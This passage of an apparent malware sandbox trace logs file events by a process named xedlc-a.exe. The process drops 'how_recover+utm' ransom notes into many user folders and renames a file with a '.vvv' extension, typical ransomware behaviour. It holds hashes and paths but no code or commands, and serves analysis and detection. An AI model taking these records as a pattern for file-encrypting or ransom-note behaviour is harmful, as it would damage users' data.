- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778278
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71062
- mode: close
- sequenceNumber: 922
- value: C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778278
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71113
- mode: created
- sequenceNumber: 923
- value: C:\Documents and Settings\admin\Application Data\Microsoft\IMJP8_1\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778279
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71120
- mode: close
- sequenceNumber: 924
- value: C:\Documents and Settings\admin\Application Data\Microsoft\IMJP8_1\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778279
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71137
- mode: created
- sequenceNumber: 925
- value: C:\Documents and Settings\admin\Application Data\Microsoft\IMJP8_1\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778280
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71143
- mode: close
- sequenceNumber: 926
- value: C:\Documents and Settings\admin\Application Data\Microsoft\IMJP8_1\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778280
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71150
- mode: open
- sequenceNumber: 927
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
- filesize: 10381
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976720131
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71230
- mode: close
- sequenceNumber: 928
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
- filesize: 10798
- md5sum: 66442d1cfc77aae37d37aef06c0221cb
- sha1sum: 2f7006e0c4d2a4c7b96d2e62fe2e700727a15b8a
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976720131
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71282
- mode: rename
- sequenceNumber: 929
- filesize: 10798
- md5sum: 66442d1cfc77aae37d37aef06c0221cb
- sha1sum: 2f7006e0c4d2a4c7b96d2e62fe2e700727a15b8a
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
- new_name: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt.vvv
- ads:
- fid (ads:): 281474976720131
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71291
- mode: created
- sequenceNumber: 930
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\Quick Launch\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778281
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71297
- mode: close
- sequenceNumber: 931
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\Quick Launch\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778281
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71304
- mode: created
- sequenceNumber: 932
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\Quick Launch\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778282
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71310
- mode: close
- sequenceNumber: 933
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\Quick Launch\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778282
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71318
- mode: created
- sequenceNumber: 934
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778283
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71324
- mode: close
- sequenceNumber: 935
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778283
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71330
- mode: created
- sequenceNumber: 936
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778284
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71336
- mode: close
- sequenceNumber: 937
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778284
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71363
- mode: created
- sequenceNumber: 938
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Media Player\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778285
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71369
- mode: close
- sequenceNumber: 939
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Media Player\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778285
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71375
- mode: created
- sequenceNumber: 940
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Media Player\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778286
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71381
- mode: close
- sequenceNumber: 941
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Media Player\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778286
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71395
- mode: created
- sequenceNumber: 942
- value: C:\Documents and Settings\admin\Application Data\Microsoft\MMC\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778287
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71400
- mode: close
- sequenceNumber: 943
- value: C:\Documents and Settings\admin\Application Data\Microsoft\MMC\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778287
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71407
- mode: created
- sequenceNumber: 944
- value: C:\Documents and Settings\admin\Application Data\Microsoft\MMC\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778288
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71413
- mode: close
- sequenceNumber: 945
- value: C:\Documents and Settings\admin\Application Data\Microsoft\MMC\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778288
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71421
- mode: created
- sequenceNumber: 946
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778289
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71427
- mode: close
- sequenceNumber: 947
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778289
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71433
- mode: created
- sequenceNumber: 948
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778290
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71440
- mode: close
- sequenceNumber: 949
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778290
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71448
- mode: created
- sequenceNumber: 950
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778291
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71454
- mode: close
- sequenceNumber: 951
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778291
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71461
- mode: created
- sequenceNumber: 952
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778292
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71466
- mode: close
- sequenceNumber: 953
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Office\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778292
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71487
- mode: created
- sequenceNumber: 954
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778293
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71492
- mode: close
- sequenceNumber: 955
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778293
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71499
- mode: created
- sequenceNumber: 956
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778294
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71505
- mode: close
- sequenceNumber: 957
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778294
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71512
- mode: created
- sequenceNumber: 958
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Proof\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778295
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71518
- mode: close
- sequenceNumber: 959
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Proof\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778295
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71524
- mode: created
- sequenceNumber: 960
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Proof\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778296
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71530
- mode: close
- sequenceNumber: 961
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Proof\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778296
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71567
- mode: created
- sequenceNumber: 962
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778297
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71573
- mode: close
- sequenceNumber: 963
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778297
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71580
- mode: created
- sequenceNumber: 964
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778298
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71587
- mode: close
- sequenceNumber: 965
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\S-1-5-21-1409082233-688789844-725345543-1003\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778298
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71594
- mode: created
- sequenceNumber: 966
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778299
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71599
- mode: close
- sequenceNumber: 967
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778299
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71616
- mode: created
- sequenceNumber: 968
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778300
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71621
- mode: close
- sequenceNumber: 969
- value: C:\Documents and Settings\admin\Application Data\Microsoft\Protect\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778300
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71630
- mode: created
- sequenceNumber: 970
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\Certificates\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778301
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71636
- mode: close
- sequenceNumber: 971
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\Certificates\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778301
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71643
- mode: created
- sequenceNumber: 972
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\Certificates\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778302
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71649
- mode: close
- sequenceNumber: 973
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\Certificates\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778302
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71658
- mode: created
- sequenceNumber: 974
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CRLs\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778303
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71665
- mode: close
- sequenceNumber: 975
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CRLs\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778303
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71673
- mode: created
- sequenceNumber: 976
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CRLs\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778304
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71680
- mode: close
- sequenceNumber: 977
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CRLs\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778304
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71690
- mode: created
- sequenceNumber: 978
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CTLs\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778305
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71696
- mode: close
- sequenceNumber: 979
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CTLs\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778305
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71702
- mode: created
- sequenceNumber: 980
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CTLs\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778306
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71708
- mode: close
- sequenceNumber: 981
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\CTLs\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778306
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 71716
- mode: created
- sequenceNumber: 982
- value: C:\Documents and Settings\admin\Application Data\Microsoft\SystemCertificates\My\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778307
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 71724
- mode: close
